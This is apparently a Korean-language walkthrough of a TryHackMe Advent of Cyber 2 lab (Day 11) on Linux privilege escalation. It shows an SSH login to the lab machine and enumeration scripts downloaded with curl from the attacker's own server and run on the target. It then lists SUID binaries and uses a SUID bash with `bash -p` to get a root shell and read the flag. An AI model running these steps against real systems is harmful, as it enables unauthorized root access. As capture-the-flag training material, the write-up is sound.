[TryHackMe] Advent of Cyber ​​2, Day 11 - Walkthrough -

본고에서는 TryHackMe 에서 제공되고 있는 Advent of Cyber ​​2 룸에 대한 공략방법(Walkthrough)에 대해 검증합니다.
"Advent of Cyber ​​2"는 "free room"(무료)에서 제공됩니다. 구독 없이 가상 머신을 "배포(Deploy)"할 수 있습니다.

「Advent of Cyber ​​2」의 Walkthrough 인덱스를 「 [TryHackMe] Advent of Cyber ​​2에 참여해 보았습니다. 」에서 공개했습니다.

[Day 11] Networking: The Rogue Gnome



스토리





이것이다! --엘프 McEager가 기다리고 있던 순간입니다. 그는 "Day 8 - What's Under the Christmas Tree?"에서 원했던 Nmap 과정의 최종 시험입니다. 지금까지의 고생이 보상된 것 같다.... "성공!"엘프 McEager는 외쳤다. "익스플로잇이 잘됐다! Yippeee!"

엘프 McEager는 대상에서 자신의 컴퓨터에 대한 리버스 쉘을 구축하는 데 성공했습니다. 그는 거의 몰랐습니다, 진짜 시험은 앞으로입니다 .... 시험의 마지막 단계에서는 엘프 McEager의 권한을 승격시켜야합니다. 그는 Nmap 의 치트 시트 공부에 시간을 보냈기 때문에 지금은 머리가 새하얗게 .... 엘프 McEager를 도와주세요.

선인이 되기 위해서는 우선 악인이 되어야 할 수도 있다. (To be the good guy, sometimes you gotta be the bad guy first...)

Day 11 - #1.



What type of privilege escalation involves using a user account to execute commands as an administrator?
  • Horizontal 권한 상승
  • Vertical 권한 승격

  • Day 11 - #2.



    What is the name of the file that contains a list of users who are a part of the sudo group?
    kali@kali:~$ ls -l /etc/sudoers
    -r--r----- 1 root root 669 Jul 12 11:52 /etc/sudoers
    

    Day 11 - #3.



    Use SSH to log in to the vulnerable machine like so: ssh cmnatic@MACHINE_IP

    Input the following password when prompted: aoc2020
    kali@kali:~$ ssh [email protected]
    The authenticity of host '10.10.178.95 (10.10.178.95)' can't be established.
    ECDSA key fingerprint is SHA256:Epte0uGyoBmg5Gb9zRw9f26JYUHv72UFd1VVNHcItUQ.
    Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
    Warning: Permanently added '10.10.178.95' (ECDSA) to the list of known hosts.
    [email protected]'s password: 
    Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-126-generic x86_64)
    
     * Documentation:  https://help.ubuntu.com
     * Management:     https://landscape.canonical.com
     * Support:        https://ubuntu.com/advantage
    
      System information as of Sat Dec 12 01:25:04 UTC 2020
    
      System load:  0.0                Processes:           92
      Usage of /:   27.8% of 14.70GB   Users logged in:     0
      Memory usage: 16%                IP address for eth0: 10.10.178.95
      Swap usage:   0%
    
    
     * Canonical Livepatch is available for installation.
       - Reduce system reboots and improve kernel security. Activate at:
         https://ubuntu.com/livepatch
    
    68 packages can be updated.
    0 updates are security updates.
    
    
    Last login: Wed Dec  9 15:49:32 2020
    -bash-4.4$ 
    

    Day 11 - #4.



    Enumerate the machine for executables that have had the SUID permission set. Look at the output and use a mixture of GTFObins and your researching skills to learn how to exploit this binary.

    You may find uploading some of the enumeration scripts that were used during today's task to be useful.
    kali@kali:~/OffsecVM$ python -m SimpleHTTPServer 8080
    Serving HTTP on 0.0.0.0 port 8080 ...
    10.10.178.95 - - [11/Dec/2020 20:37:30] "GET /LinEmu.sh HTTP/1.1" 200 -
    
    #EndOfScript-bash-4.4$ curl http://10.11.19.198:8080/LinEmu.sh -o LinEmu.sh
      % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                     Dload  Upload   Total   Spent    Left  Speed
    100 46630  100 46630    0     0  42390      0  0:00:01  0:00:01 --:--:-- 42390
    -bash-4.4$
    
    -bash-4.4$ chmod +x LinEmu.sh
    -bash-4.4$ ./LinEmu.sh
    


    -bash-4.4$ curl http://10.11.19.198:8080/linpeas.sh -o linpeas.sh
      % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                     Dload  Upload   Total   Spent    Left  Speed
    100  228k  100  228k    0     0   100k      0  0:00:02  0:00:02 --:--:--  100k
    -bash-4.4$ chmod +x linpeas.sh
    -bash-4.4$ ./linpeas.sh
    


    -bash-4.4$ find / -perm -u=s -type f 2>/dev/null
    /bin/umount
    /bin/mount
    /bin/su
    /bin/fusermount
    /bin/bash
    /bin/ping
    /snap/core/10444/bin/mount
    /snap/core/10444/bin/ping
    /snap/core/10444/bin/ping6
    /snap/core/10444/bin/su
    /snap/core/10444/bin/umount
    /snap/core/10444/usr/bin/chfn
    /snap/core/10444/usr/bin/chsh
    /snap/core/10444/usr/bin/gpasswd
    /snap/core/10444/usr/bin/newgrp
    /snap/core/10444/usr/bin/passwd
    /snap/core/10444/usr/bin/sudo
    /snap/core/10444/usr/lib/dbus-1.0/dbus-daemon-launch-helper
    /snap/core/10444/usr/lib/openssh/ssh-keysign
    /snap/core/10444/usr/lib/snapd/snap-confine
    /snap/core/10444/usr/sbin/pppd
    /snap/core/7270/bin/mount
    /snap/core/7270/bin/ping
    /snap/core/7270/bin/ping6
    /snap/core/7270/bin/su
    /snap/core/7270/bin/umount
    /snap/core/7270/usr/bin/chfn
    /snap/core/7270/usr/bin/chsh
    /snap/core/7270/usr/bin/gpasswd
    /snap/core/7270/usr/bin/newgrp
    /snap/core/7270/usr/bin/passwd
    /snap/core/7270/usr/bin/sudo
    /snap/core/7270/usr/lib/dbus-1.0/dbus-daemon-launch-helper
    /snap/core/7270/usr/lib/openssh/ssh-keysign
    /snap/core/7270/usr/lib/snapd/snap-confine
    /snap/core/7270/usr/sbin/pppd
    /usr/bin/newgidmap
    /usr/bin/at
    /usr/bin/sudo
    /usr/bin/chfn
    /usr/bin/newgrp
    /usr/bin/passwd
    /usr/bin/gpasswd
    /usr/bin/pkexec
    /usr/bin/newuidmap
    /usr/bin/traceroute6.iputils
    /usr/bin/chsh
    /usr/lib/openssh/ssh-keysign
    /usr/lib/dbus-1.0/dbus-daemon-launch-helper
    /usr/lib/policykit-1/polkit-agent-helper-1
    /usr/lib/eject/dmcrypt-get-device
    /usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
    /usr/lib/snapd/snap-confine
    -bash-4.4$ 
    

    Day 11 - #5.



    Use this executable to launch a system shell as root.

    What are the contents of the file located at/root/flag.txt?

    -bash-4.4$ whoami
    cmnatic
    -bash-4.4$ bash -p
    bash-4.4# whoami
    root
    
    bash-4.4# cat /root/flag.txt
    thm{2fb1{BLOCKED}6592}
    

    유용한 TryHackMe 객실


  • Shells and Privilege Escalation

  • Walkthrough


  • BRYAN WENDT, TryHackMe – Advent of Cyber ​​2 – Day 11 – Walkthrough
  • NEERANJAN MURUGAN, Advent of Cyber ​​2 ~ Try Hack Me
  • 좋은 웹페이지 즐겨찾기